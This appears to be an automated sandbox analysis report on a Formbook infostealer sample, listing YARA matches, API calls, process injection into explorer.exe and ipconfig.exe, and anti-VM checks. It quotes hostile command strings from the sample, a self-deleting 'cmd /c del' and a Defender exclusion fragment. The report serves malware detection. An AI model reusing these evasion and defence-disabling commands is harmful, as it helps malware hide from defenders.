          Source: 0.2.NvkGETsSDb.exe.39e0150.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.NvkGETsSDb.exe.39e0150.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.516991020.00000000028C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.516991020.00000000028C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.303659400.000000000F70F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.303659400.000000000F70F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.253147010.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.253147010.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.315756855.0000000000FD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.315756855.0000000000FD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.515839448.0000000002700000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.515839448.0000000002700000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.288307054.000000000F70F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.288307054.000000000F70F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.253638394.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.253638394.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.315792746.0000000001000000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.315792746.0000000001000000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.257370628.00000000038A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.257370628.00000000038A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 02B9B150 appears 48 times
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 2_2_0041A360 NtCreateFile,2_2_0041A360
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 2_2_0041A410 NtReadFile,2_2_0041A410
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 2_2_0041A490 NtClose,2_2_0041A490
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 2_2_0041A540 NtAllocateVirtualMemory,2_2_0041A540
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 2_2_0041A35A NtCreateFile,2_2_0041A35A
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 2_2_0041A40A NtReadFile,2_2_0041A40A
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 2_2_0041A48A NtClose,2_2_0041A48A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9A50 NtCreateFile,LdrInitializeThunk,16_2_02BD9A50
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9860 NtQuerySystemInformation,LdrInitializeThunk,16_2_02BD9860
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9840 NtDelayExecution,LdrInitializeThunk,16_2_02BD9840
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD99A0 NtCreateSection,LdrInitializeThunk,16_2_02BD99A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9910 NtAdjustPrivilegesToken,LdrInitializeThunk,16_2_02BD9910
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD96E0 NtFreeVirtualMemory,LdrInitializeThunk,16_2_02BD96E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD96D0 NtCreateKey,LdrInitializeThunk,16_2_02BD96D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9780 NtMapViewOfSection,LdrInitializeThunk,16_2_02BD9780
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9FE0 NtCreateMutant,LdrInitializeThunk,16_2_02BD9FE0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9710 NtQueryInformationToken,LdrInitializeThunk,16_2_02BD9710
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD95D0 NtClose,LdrInitializeThunk,16_2_02BD95D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9540 NtReadFile,LdrInitializeThunk,16_2_02BD9540
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9A80 NtOpenDirectoryObject,16_2_02BD9A80
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9A20 NtResumeThread,16_2_02BD9A20
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9A10 NtQuerySection,16_2_02BD9A10
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9A00 NtProtectVirtualMemory,16_2_02BD9A00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BDA3B0 NtGetContextThread,16_2_02BDA3B0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9B00 NtSetValueKey,16_2_02BD9B00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD98A0 NtWriteVirtualMemory,16_2_02BD98A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD98F0 NtReadVirtualMemory,16_2_02BD98F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9820 NtEnumerateKey,16_2_02BD9820
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BDB040 NtSuspendThread,16_2_02BDB040
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD99D0 NtCreateProcessEx,16_2_02BD99D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9950 NtQueueApcThread,16_2_02BD9950
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9610 NtEnumerateValueKey,16_2_02BD9610
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9670 NtQueryInformationProcess,16_2_02BD9670
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9660 NtAllocateVirtualMemory,16_2_02BD9660
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9650 NtQueryValueKey,16_2_02BD9650
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD97A0 NtUnmapViewOfSection,16_2_02BD97A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9730 NtQueryVirtualMemory,16_2_02BD9730
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BDA710 NtOpenProcessToken,16_2_02BDA710
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BDA770 NtOpenThread,16_2_02BDA770
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9770 NtSetInformationFile,16_2_02BD9770
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9760 NtOpenProcess,16_2_02BD9760
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD95F0 NtQueryInformationFile,16_2_02BD95F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BDAD30 NtSetContextThread,16_2_02BDAD30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9520 NtWaitForSingleObject,16_2_02BD9520
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9560 NtWriteFile,16_2_02BD9560
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0016A360 NtCreateFile,16_2_0016A360
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0016A410 NtReadFile,16_2_0016A410
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0016A490 NtClose,16_2_0016A490
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0016A35A NtCreateFile,16_2_0016A35A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0016A40A NtReadFile,16_2_0016A40A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0016A48A NtClose,16_2_0016A48A
          Source: NvkGETsSDb.exeBinary or memory string: OriginalFilename vs NvkGETsSDb.exe
          Source: NvkGETsSDb.exe, 00000000.00000002.256996800.00000000028A1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameTaskNode.dll4 vs NvkGETsSDb.exe
          Source: NvkGETsSDb.exe, 00000000.00000000.246291055.000000000019A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameComMemberTy.exe< vs NvkGETsSDb.exe
          Source: NvkGETsSDb.exe, 00000002.00000002.315857212.000000000103A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs NvkGETsSDb.exe
          Source: NvkGETsSDb.exe, 00000002.00000000.251515898.00000000009FA000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameComMemberTy.exe< vs NvkGETsSDb.exe
          Source: NvkGETsSDb.exe, 00000002.00000002.316178527.000000000158F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs NvkGETsSDb.exe
          Source: NvkGETsSDb.exeBinary or memory string: OriginalFilenameComMemberTy.exe< vs NvkGETsSDb.exe
          Source: NvkGETsSDb.exeVirustotal: Detection: 15%
          Source: NvkGETsSDb.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\NvkGETsSDb.exe 'C:\Users\user\Desktop\NvkGETsSDb.exe'
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeProcess created: C:\Users\user\Desktop\NvkGETsSDb.exe C:\Users\user\Desktop\NvkGETsSDb.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NvkGETsSDb.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NvkGETsSDb.exe.log
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@3/3
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: NvkGETsSDb.exeJoe Sandbox Cloud Basic: Detection: clean Score: 0
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6344:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: NvkGETsSDb.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: NvkGETsSDb.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: ipconfig.pdb source: NvkGETsSDb.exe, 00000002.00000002.315857212.000000000103A000.00000004.00000020.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: NvkGETsSDb.exe, 00000002.00000002.315857212.000000000103A000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: NvkGETsSDb.exe, 00000002.00000002.315947777.0000000001470000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: NvkGETsSDb.exe, 00000002.00000002.315947777.0000000001470000.00000040.00000001.sdmp, ipconfig.exe

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: NvkGETsSDb.exe, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.0.NvkGETsSDb.exe.180000.0.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.2.NvkGETsSDb.exe.180000.0.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 2.0.NvkGETsSDb.exe.9e0000.2.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 2.0.NvkGETsSDb.exe.9e0000.3.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 2.0.NvkGETsSDb.exe.9e0000.1.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 2.0.NvkGETsSDb.exe.9e0000.7.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 2.0.NvkGETsSDb.exe.9e0000.0.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 2.2.NvkGETsSDb.exe.9e0000.1.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 2.0.NvkGETsSDb.exe.9e0000.5.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 2.0.NvkGETsSDb.exe.9e0000.9.unpack, Platformer_AI/GameDisplay.cs .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe Code function: 0_2_04DC5155 pushad ; iretd 0_2_04DC515B
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe Code function: 0_2_04DCCB65 push FFFFFF8Bh; iretd 0_2_04DCCB67
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe Code function: 2_2_00417162 push ebp; ret 2_2_00417163
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe Code function: 2_2_0041D4B5 push eax; ret 2_2_0041D508
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe Code function: 2_2_0041D56C push eax; ret 2_2_0041D572
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe Code function: 2_2_0041D502 push eax; ret 2_2_0041D508
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe Code function: 2_2_0041D50B push eax; ret 2_2_0041D572
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe Code function: 2_2_004165E8 push es; retf 2_2_004165E9
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe Code function: 2_2_0041CE35 push edi; ret 2_2_0041CE36
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe Code function: 2_2_004176DE push ebp; iretd 2_2_004176A6
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe Code function: 2_2_0041768B push ebp; iretd 2_2_004176A6
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 16_2_02BED0D1 push ecx; ret 16_2_02BED0E4
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 16_2_0015011E push esp; iretd 16_2_00150120
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 16_2_00167162 push ebp; ret 16_2_00167163
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 16_2_0016E3EF push esp; ret 16_2_0016E3F1
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 16_2_0016D4B5 push eax; ret 16_2_0016D508
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 16_2_0016D502 push eax; ret 16_2_0016D508
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 16_2_0016D50B push eax; ret 16_2_0016D572
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 16_2_0016D56C push eax; ret 16_2_0016D572
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 16_2_001665E8 push es; retf 16_2_001665E9
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 16_2_0016CE35 push edi; ret 16_2_0016CE36
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 16_2_0016768B push ebp; iretd 16_2_001676A6
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 16_2_001676DE push ebp; iretd 16_2_001676A6

          Persistence and Installation Behavior:

          Uses ipconfig to lookup or modify the Windows network settings
          Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xE7
          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\ipconfig.exe Process created: /c del 'C:\Users\user\Desktop\NvkGETsSDb.exe'
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\ipconfig.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara match File source: 0.2.NvkGETsSDb.exe.28ed0f8.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000000.00000002.256996800.00000000028A1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: Process Memory Space: NvkGETsSDb.exe PID: 2500, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: NvkGETsSDb.exe, 00000000.00000002.256996800.00000000028A1000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
          Source: NvkGETsSDb.exe, 00000000.00000002.256996800.00000000028A1000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exe RDTSC instruction interceptor: First address: 0000000000159904 second address: 000000000015990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exe RDTSC instruction interceptor: First address: 0000000000159B7E second address: 0000000000159B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe TID: 1400 Thread sleep time: -43030s >= -30000s
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe TID: 1140 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6804 Thread sleep time: -42000s >= -30000s
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 6452 Thread sleep time: -40000s >= -30000s
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe Code function: 2_2_00409AB0 rdtsc 2_2_00409AB0
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe Thread delayed: delay time: 43030
          Source: NvkGETsSDb.exe, 00000000.00000002.256996800.00000000028A1000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000004.00000000.265903999.000000000891C000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
          Source: NvkGETsSDb.exe, 00000000.00000002.256996800.00000000028A1000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000004.00000000.293819740.0000000003710000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: NvkGETsSDb.exe, 00000000.00000002.256996800.00000000028A1000.00000004.00000001.sdmp Binary or memory string: vmware
          Source: explorer.exe, 00000004.00000000.292595814.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000004.00000000.300532803.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000004.00000000.294597949.00000000053C4000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000004.00000000.300532803.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: NvkGETsSDb.exe, 00000000.00000002.256996800.00000000028A1000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe Code function: 2_2_00409AB0 rdtsc 2_2_00409AB0
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\ipconfig.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 16_2_02BAAAB0 mov eax, dword ptr fs:[00000030h] 16_2_02BAAAB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C6070D mov eax, dword ptr fs:[00000030h]16_2_02C6070D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C6070D mov eax, dword ptr fs:[00000030h]16_2_02C6070D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C2FF10 mov eax, dword ptr fs:[00000030h]16_2_02C2FF10
